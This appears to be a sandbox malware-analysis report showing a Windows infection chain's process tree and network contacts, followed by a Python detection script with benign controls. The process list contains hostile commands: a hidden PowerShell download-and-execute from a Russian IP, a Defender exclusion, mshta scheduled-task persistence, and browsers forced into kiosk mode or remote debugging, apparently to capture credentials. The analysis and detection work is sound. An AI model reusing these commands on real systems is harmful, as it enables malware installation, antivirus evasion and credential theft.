| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe
"C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe
"C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10107211121\PcAIvJ0.cmd"
C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe
"C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe"
C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe"
C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe"
C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe"
C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe"
C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4596 -ip 4596
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4596 -s 796
C:\Users\Admin\AppData\Local\Temp\10107240101\ce4pMzk.exe
"C:\Users\Admin\AppData\Local\Temp\10107240101\ce4pMzk.exe"
C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe
"C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe"
C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe
"C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4496 -ip 4496
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4496 -s 800
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\10107260101\SvhQA35.exe
"C:\Users\Admin\AppData\Local\Temp\10107260101\SvhQA35.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe
C:\Users\Admin\AppData\Local\Temp\10107260101\SvhQA35.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\Oar936gK\Anubis.exe""
C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe
"C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe"
C:\Users\Admin\AppData\Local\Temp\10107280101\Ps7WqSx.exe
"C:\Users\Admin\AppData\Local\Temp\10107280101\Ps7WqSx.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff99555cc40,0x7ff99555cc4c,0x7ff99555cc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1912,i,11762335795755205314,7482908786277413718,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1904 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2140,i,11762335795755205314,7482908786277413718,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2164 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2220,i,11762335795755205314,7482908786277413718,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2236 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3168,i,11762335795755205314,7482908786277413718,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3180 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3204,i,11762335795755205314,7482908786277413718,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3212 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4232,i,11762335795755205314,7482908786277413718,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4452 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4684,i,11762335795755205314,7482908786277413718,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4448 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4644,i,11762335795755205314,7482908786277413718,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4764 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4840,i,11762335795755205314,7482908786277413718,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4848 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4616,i,11762335795755205314,7482908786277413718,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4668 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4632,i,11762335795755205314,7482908786277413718,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4660 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5048,i,11762335795755205314,7482908786277413718,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4720 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5240,i,11762335795755205314,7482908786277413718,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5260 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5248,i,11762335795755205314,7482908786277413718,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5400 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=4860,i,11762335795755205314,7482908786277413718,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5344 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9955646f8,0x7ff995564708,0x7ff995564718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,6178398465063867357,3272688161587545164,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2120 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,6178398465063867357,3272688161587545164,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,6178398465063867357,3272688161587545164,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2924 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2108,6178398465063867357,3272688161587545164,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2108,6178398465063867357,3272688161587545164,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2108,6178398465063867357,3272688161587545164,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4884 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2108,6178398465063867357,3272688161587545164,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4912 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\10107290101\ktxzLhN.exe
"C:\Users\Admin\AppData\Local\Temp\10107290101\ktxzLhN.exe"
C:\Users\Admin\AppData\Local\Temp\dll32.exe
"C:\Users\Admin\AppData\Local\Temp\dll32.exe"
C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
"C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe"
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\10107320101\nhDLtPT.exe
"C:\Users\Admin\AppData\Local\Temp\10107320101\nhDLtPT.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\a1vsr" & exit
C:\Windows\SysWOW64\timeout.exe
timeout /t 11
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe
"C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe"
C:\Users\Admin\AppData\Local\Temp\10107370101\c29c440560.exe
"C:\Users\Admin\AppData\Local\Temp\10107370101\c29c440560.exe"
C:\Users\Admin\AppData\Local\Temp\BB8Z9QLVS663O4EQKUQWIVS.exe
"C:\Users\Admin\AppData\Local\Temp\BB8Z9QLVS663O4EQKUQWIVS.exe"
C:\Users\Admin\AppData\Local\Temp\10107380101\9bd1404279.exe
"C:\Users\Admin\AppData\Local\Temp\10107380101\9bd1404279.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp74A9.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp74A9.tmp.bat
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 4036"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Users\Admin\AppData\Roaming\AdminUserCash\tempdatalogger.exe
"C:\Users\Admin\AppData\Roaming\AdminUserCash\tempdatalogger.exe"
C:\Users\Admin\AppData\Local\Temp\10107390101\4b886460ab.exe
"C:\Users\Admin\AppData\Local\Temp\10107390101\4b886460ab.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM firefox.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM chrome.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM msedge.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM opera.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM brave.exe /T
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1972 -parentBuildID 20240401114208 -prefsHandle 1892 -prefMapHandle 1884 -prefsLen 27434 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1288b6b4-acc0-4fb8-b3e0-bf258b5d3e09} 868 "\\.\pipe\gecko-crash-server-pipe.868" gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2448 -parentBuildID 20240401114208 -prefsHandle 2440 -prefMapHandle 2428 -prefsLen 28354 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {919343b5-487f-4bb9-8234-2ba94088cbb6} 868 "\\.\pipe\gecko-crash-server-pipe.868" socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2952 -childID 1 -isForBrowser -prefsHandle 3092 -prefMapHandle 3084 -prefsLen 22746 -prefMapSize 244658 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bd8b631e-889c-4d04-95d5-5f47b1f657a2} 868 "\\.\pipe\gecko-crash-server-pipe.868" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3768 -childID 2 -isForBrowser -prefsHandle 3760 -prefMapHandle 2656 -prefsLen 32844 -prefMapSize 244658 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4fb1000a-5b0a-4287-ba1f-a802406fb8d8} 868 "\\.\pipe\gecko-crash-server-pipe.868" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4532 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4488 -prefMapHandle 4548 -prefsLen 32844 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7ada337d-3d57-4a67-9e56-019689dfa887} 868 "\\.\pipe\gecko-crash-server-pipe.868" utility
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5268 -childID 3 -isForBrowser -prefsHandle 5260 -prefMapHandle 5256 -prefsLen 27038 -prefMapSize 244658 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9825762a-9206-4b62-a43c-d05bccd37969} 868 "\\.\pipe\gecko-crash-server-pipe.868" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5396 -childID 4 -isForBrowser -prefsHandle 5404 -prefMapHandle 5408 -prefsLen 27038 -prefMapSize 244658 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cefbf1c8-a3c1-48a8-91dd-114db38a2a66} 868 "\\.\pipe\gecko-crash-server-pipe.868" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5584 -childID 5 -isForBrowser -prefsHandle 5592 -prefMapHandle 5596 -prefsLen 27038 -prefMapSize 244658 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {078f9894-34c5-4f6f-b514-41aca0c5dcc7} 868 "\\.\pipe\gecko-crash-server-pipe.868" tab
C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe
"C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe"
C:\Users\Admin\AppData\Local\Temp\10107410101\263971d093.exe
"C:\Users\Admin\AppData\Local\Temp\10107410101\263971d093.exe"
C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe
"C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe"
C:\Users\Admin\AppData\Local\Temp\10107430101\cnntXtU.exe
"C:\Users\Admin\AppData\Local\Temp\10107430101\cnntXtU.exe"
C:\Users\Admin\AppData\Local\Temp\10107440101\c4c05d45b7.exe
"C:\Users\Admin\AppData\Local\Temp\10107440101\c4c05d45b7.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn U46nTma0qtq /tr "mshta C:\Users\Admin\AppData\Local\Temp\ZhnsozvtJ.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\Admin\AppData\Local\Temp\ZhnsozvtJ.hta
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn U46nTma0qtq /tr "mshta C:\Users\Admin\AppData\Local\Temp\ZhnsozvtJ.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'T2V75N5KCPZXOWYLTGU2QWHAP8OYMKGH.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
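Of the process list above, the cmd.exe → schtasks, mshta and powershell.exe command lines are the ones a detection engineer would turn into rules: a scheduled task whose action is mshta on a .hta in the user's Temp directory, and a hidden PowerShell that downloads an executable and runs it in the same line. The Python below is an added example, not part of this report or of the sandbox that produced it. It runs three rules over those four command lines (copied verbatim) plus two constructed benign controls; rule names, the control lines and the output format are mine. One caveat worth noting: the PowerShell one-liner concatenates `$env:temp` and the file name with no path separator, so the downloaded file lands beside the Temp directory rather than inside it, and the download-and-execute rule is deliberately not keyed on a Temp path.

```python
import re

# Command lines copied verbatim from the process list of this report.
REPORT_COMMAND_LINES = [
    r'C:\Windows\system32\cmd.exe /c schtasks /create /tn U46nTma0qtq /tr "mshta C:\Users\Admin\AppData\Local\Temp\ZhnsozvtJ.hta" /sc minute /mo 25 /ru "Admin" /f',
    r'mshta C:\Users\Admin\AppData\Local\Temp\ZhnsozvtJ.hta',
    r'schtasks /create /tn U46nTma0qtq /tr "mshta C:\Users\Admin\AppData\Local\Temp\ZhnsozvtJ.hta" /sc minute /mo 25 /ru "Admin" /f',
    r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'T2V75N5KCPZXOWYLTGU2QWHAP8OYMKGH.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;''',
]

# Constructed benign controls (not from the report): ordinary schtasks and
# PowerShell use that the rules must not flag.
BENIGN_CONTROL_LINES = [
    r'schtasks /create /tn NightlyBackup /tr "C:\Tools\backup.exe" /sc daily /ru SYSTEM /f',
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command Get-Process',
]

TR_VALUE = re.compile(r'/tr\s+"([^"]*)"', re.I)            # schtasks action
TN_VALUE = re.compile(r'/tn\s+"?([^"\s]+)', re.I)          # schtasks task name
TEMP_HTA = re.compile(r'\\AppData\\Local\\Temp\\[^\s"]+\.hta\b', re.I)
URL = re.compile(r'''https?://[^\s'"()]+''', re.I)


def image_name(cmd):
    """Lower-cased basename of the process image, i.e. the first (possibly quoted) token."""
    cmd = cmd.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        token = cmd[1:end] if end != -1 else cmd[1:]
    else:
        token = cmd.split(None, 1)[0]
    return token.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def scan(cmd):
    """Apply the three rules to one command line; return a list of hits."""
    hits = []
    image = image_name(cmd)

    # Rule 1: schtasks /create whose action launches mshta (HTA-based persistence).
    # Fires on the cmd.exe wrapper and on the schtasks.exe child alike.
    if re.search(r'\bschtasks\b.*\s/create\b', cmd, re.I):
        tr = TR_VALUE.search(cmd)
        if tr and re.match(r'\s*"?mshta\b', tr.group(1), re.I):
            tn = TN_VALUE.search(cmd)
            hits.append({"rule": "schtasks_hta_persistence", "image": image,
                         "indicator": tn.group(1) if tn else tr.group(1)})

    # Rule 2: mshta itself running an .hta out of the user's Temp directory.
    if image in ("mshta", "mshta.exe"):
        hta = TEMP_HTA.search(cmd)
        if hta:
            hits.append({"rule": "mshta_temp_hta", "image": image, "indicator": hta.group(0)})

    # Rule 3: hidden PowerShell that downloads a file and runs it in one line.
    # Keyed on behaviour (hidden window + DownloadFile + Start-Process), not on
    # the destination path, because the path here is not actually under Temp.
    if image in ("powershell", "powershell.exe", "pwsh.exe"):
        if (re.search(r'-windowstyle\s+hidden', cmd, re.I)
                and re.search(r'\.DownloadFile\(', cmd, re.I)
                and re.search(r'\bStart-Process\b', cmd, re.I)):
            url = URL.search(cmd)
            hits.append({"rule": "powershell_hidden_download_exec", "image": image,
                         "indicator": url.group(0) if url else ""})
    return hits


def scan_all(lines):
    """Run scan() over every command line and flatten the hits."""
    return [hit for cmd in lines for hit in scan(cmd)]


if __name__ == "__main__":
    for hit in scan_all(REPORT_COMMAND_LINES + BENIGN_CONTROL_LINES):
        print(f'{hit["rule"]:32} {hit["image"]:16} {hit["indicator"]}')
```

Run as a script it prints four hits (two for the task creation, seen from cmd.exe and from schtasks.exe, one for mshta, one for PowerShell) and nothing for the two controls. The task name, the .hta path and the download URL come out as the indicators to pivot on; the URL host reappears in the Network table below.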
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| RU | 176.113.115.6:80 | 176.113.115.6 | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | joyfulhezart.tech | udp |
| US | 8.8.8.8:53 | hardswarehub.today | udp |
| US | 8.8.8.8:53 | gadgethgfub.icu | udp |
| US | 8.8.8.8:53 | hardrwarehaven.run | udp |
| US | 8.8.8.8:53 | techmindzs.live | udp |
| US | 8.8.8.8:53 | codxefusion.top | udp |
| US | 104.21.69.194:443 | codxefusion.top | tcp |
| US | 104.21.69.194:443 | codxefusion.top | tcp |
| US | 104.21.69.194:443 | codxefusion.top | tcp |
| US | 104.21.69.194:443 | codxefusion.top | tcp |
| US | 104.21.69.194:443 | codxefusion.top | tcp |
| US | 104.21.69.194:443 | codxefusion.top | tcp |
| US | 8.8.8.8:53 | www.dropbox.com | udp |
| GB | 162.125.64.18:443 | www.dropbox.com | tcp |
| US | 8.8.8.8:53 | biochextryhub.bet | udp |
| US | 172.67.192.128:443 | biochextryhub.bet | tcp |
| US | 172.67.192.128:443 | biochextryhub.bet | tcp |
| US | 172.67.192.128:443 | biochextryhub.bet | tcp |
| US | 172.67.192.128:443 | biochextryhub.bet | tcp |
| US | 172.67.192.128:443 | biochextryhub.bet | tcp |
